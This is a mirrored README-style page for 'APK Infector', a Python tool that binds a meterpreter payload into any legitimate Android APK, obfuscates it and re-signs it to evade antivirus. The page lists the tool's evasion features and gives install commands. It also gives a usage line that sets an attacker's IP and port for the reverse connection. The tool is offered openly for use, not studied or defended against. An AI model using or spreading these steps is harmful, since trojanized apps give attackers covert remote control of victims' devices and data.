项目作者: PushpenderIndia

项目描述 :
Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK
高级语言: Python
项目地址: git://github.com/PushpenderIndia/apkinfector.git
创建时间: 2020-02-08T11:46:33Z
项目社区:https://github.com/PushpenderIndia/apkinfector

开源协议:

下载



APK Infector Logo

APK Infector














  1. This small python script can do really awesome work.

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.

Features

  • Fully Automate Payload Creation Using MSFvenom
  • Creates a handler.rc File
  • Undetectable
  • Ofusticate Meterpreter APK
  • Binds/Embeds Meterpreter APK with Any Legitimate APK
  • Automatically Generates a Key which is used in signing
  • Capable to Sign APK Using Jarsigner or APKsigner
  • Zipalign the Signed APK
  • Shuffles the Permissions of Meterpreter APK for AV Evasion
  • Changes the default foldername and filenames which are being flagged by AV

Tools Overview

Front View Sample Feature
Index f

Prerequisite

  • Python 3.X
  • APKsigner or Jarsigner [One of them]
  • APK Tool [Latest]
  • ZipAlign

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage

  1. # Navigate to the /opt directory (optional)
  2. $ cd /opt/
  3. # Clone this repository
  4. $ git clone https://github.com/PushpenderIndia/apkinfector.git
  5. # Navigate to technowlogger folder
  6. $ cd apkinfector
  7. # Installing dependencies
  8. $ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner
  9. # Running the Tool for 1st Time
  10. $ python3 infector.py --help
  11. # Usage Example
  12. $ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h —help show this help message and exit
  • Required Arguments
Short Hand Full Hand Description
—lhost 192.168.44.33 Attacker’s IP Address
—lport 4444 Attacker’s Port
-n NORMAL_APK —normal-apk NORMAL_APK Absolute Path of Legitimate APK File
—apk-name APKNAME APK Name (Anything You Want To Name)

Contribute

  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.